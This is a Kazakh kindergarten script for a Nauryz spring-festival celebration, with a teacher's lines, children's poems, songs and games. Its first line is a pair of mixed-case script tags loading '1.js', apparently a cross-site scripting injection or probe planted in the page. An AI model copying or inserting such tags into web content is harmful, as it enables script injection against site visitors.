<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.03.2018

 

                              Ақмола облысы

                         Ақкөл ауданы

Новорыбин орта мектебі-

бақшасы ММ

                                                 

Тәрбиеші: Контарбаева Г.С.

Тақырыбы: Қош келдің, Әз Наурыз!

Тәрбиеші:

Наурыз айы жүректерге нұр сепкен,

Мандайымнан сүйіп жатыр нұр көктем

Жарығымен, шуағымен Күн - Ана

Алып келдің жер бетіне нұр көктем!

Осыншама жақсылық,

Алып келдің Наурызым!

Төрлет бізге нұр болып,

Шуақ шашып нұр жүзің!

Ұлыстың ұлы күні құтты болсын!

Балалар хормен: «Қош келдің, Әз Наурыз!»

Ислам.(тақпағы).

Тәрбиеші: Ұлыстың ұлы күнін, яғни төл мейрамымызды қазақ халқының ұлттық биімен

ашқымыз келіп отыр.

Жүргізуші:

Наурыз — шаттық әніміз,

Салтанатты сәніміз.

Ән салып, жас пен кәріміз,

Би билейік бәріміз.

Тәрбиеші:

В наши юные года,

Танцам рады мы всегда.

Даже через много лет,

Мы их не разлюбим, нет!

Би: «Қазақ биі»

Тәрбиеші:- Балалар біздер қандай

мерекені тойлап жатырмыз?

Балалар: - Наурыз мерекесін тойлап

жатырмыз.

- Балалар бізге Наурызда келіп қалыпты.

Тәрбиеші: Балалар жыл мезгілі

қандай?  

.Көктем:

            Приглашаем группу Малышок:

Тәрбиеші:

Келесі кезекті  Наурыз  туралы  тақпақтарға береміз.

 Аяулым:

Құтты болсын Наурыз

Жалқаулық қос жауымыз

Дала толы егіске,

Малға толсын тауымыз

Дінмұхамед:

Наурыз тойы әдемі,

Әжем еске түсірді

Біздерге арнап әдемі,

Наурыз көже пісірді.

Олжас

Кел балалар ойнайық,

Наурыз тойын тойлайық

Баянды боп мереке

Қыр гүліндей жайнайық

Бибарыс:

Ұлыс оң болсын. Ақ мол болсын!

Қайда барсаң, жол болсын

Төрт түлік ақты болсын,

Ұлыс береке берсін,

Бекбүлат:

Кел жырлайық бәріміз

Балабақша төрінде

Жырлап әнге салайық

Бақытты біз баламыз.

Хормен: Наурыз тойы салтымыз

Аман болсын халқымыз

Ұлыс оң болсын, ақ мол болсын

Наурыз құтты болсын!                                      

                                             Ән:Наурыз.


Тәрбиеші: Наурыз көже Наурыз

мейрамының негізгі тамағы.                                                        

Әжені шақыру

Оған 7түрлі тағам қосылады. Олар: қыстан қалған сүр, айран, сүт, тұз, құрт,

тары, бидай. 7саны киелі сан. Ал наурыз көже тоқшылық белгісі.

Тәрбиеші: Әже, біздің балаларымыз наурыз көже туралы тақпақ айтқылары келіп тұр

екен, олай болса кезекті балалар тақпақтарына берейік.

Ақсәуле:

Арпа, бидай, тары бар

Қатық, малта, тағы бар

Ішілетін, жейтінің

Бұл көжеде бәрі бар.

Тәрбиеші: .

 Қасиет еткен халқымыз,

Жаңғыртар дәстүр салтымыз

Сән салтымен ел көрікті

Салт дәстүрді сыйлау үлкен міндет.

                                      «Тұсау

кесу дәстүр»

                           Приглашаем группу «Солнышко»

                                   Ойын: «Арқан

тарту» « Асық  ойыны».

Тәрбиеші: Міне, Наурыз мейрамының ерекше

мейрам екеніне тағы бір көзіміз жетті.  Ал енді біздің балаларымыздың өнерін

тамашалаңыздар.

Тәрбиеші:

Сәнді көктем нұрымен

Наурыз тойы жырымен

Көңіл гүлдей жайнасын

Наурыз тойы тойлансын.

                 

Балалардың көктем туралы

тақпақтарың тамашалау кезек те келіп                                          қалды.

                          «Гүлдер тобын

шақырамыз».

Мансур:

Көктем келді, көктем келді.                                              

Жадыраған жайнаған.

 Шашыраған

сәулесімен,

 Жасыл көктем

сайраған

Асылмұрат:.

 Самал беттен

өбеді,

 Көкте бұлттар

көбейді.

 Құстар да жетер ән

салып,

 Көгілдір нұрға тамсанып.

Нурдаулет:

Келіп көктем құстары

Бау-бақшада ән салды

Оларды жас достары

Ұя жасап қарсы алды.

Саян:

Коктем қандай коңілді

Күміс жаңбыр тогілді

Молдір аспан ашылып

Күн пердесі сөгілді.

Мейзжан:

Сәнді көктем –Наурыз

Наурыз тойы жырымыз

Көңіл гүлдей жайнасын

Күлпырсын күн мен ай

Құтты болсын Наурыз.

Бекарыс:

Сөнбе ешқашан күніміз

Тілейді мұны жеріміз

Тілейді мұны еліміз

Тілейді мұны бәріміз.

Бахтияр:

Көктем-көктем көктемде

Күн күркіреп өткенде

Нұр жаңбырды тосамыз

Көктемді әнге қосамыз

Шомылып нұрға атырап

Ағаштар жайды жапырақ

Далаға бірден жаралды

Көктеммен жұпар шашырап. 

Меруерт:

Бүршік жарып ағаштар

Құстар ұя салады.

Сылдыраған бұлақтар

Ағып бара жатады.

Назерке:

Көктем болды алақай,

Қуанар барлық балақай.

Көктемде жаңбыр болады,

Бақшаға гүлдер толады.

                               Ән: «Балапан».

 

 

Ойын: « Күш сынасу»

Тәрбиеші:

Батаменен ел көгерер, жаңбыр менен жер көгерер,- дегендей сіздерден  бата күтеміз.

Жүргізуші:

Мы вместе сегодня праздник встречали,

Пели, плясали, стихи читали.

Наурыз нам праздник подарил,

Наурыз нас всех объединил!

Тәрбиеші:

Жаңғыртқан дәстүрімізді:

Қош болыңыз, Наурызым ардақты

Халқым саған бар үмітін жалғапты!

Жылда осылай келе берсін жарасып!

Ұлыстың ұлы күні құтты болсын!

Наурыз береке – бірлік әкелсін!

Сау болыңыздар!


 

Просмотров: 1214


Пікір қосу



Деректерді қолтаңбаға қосу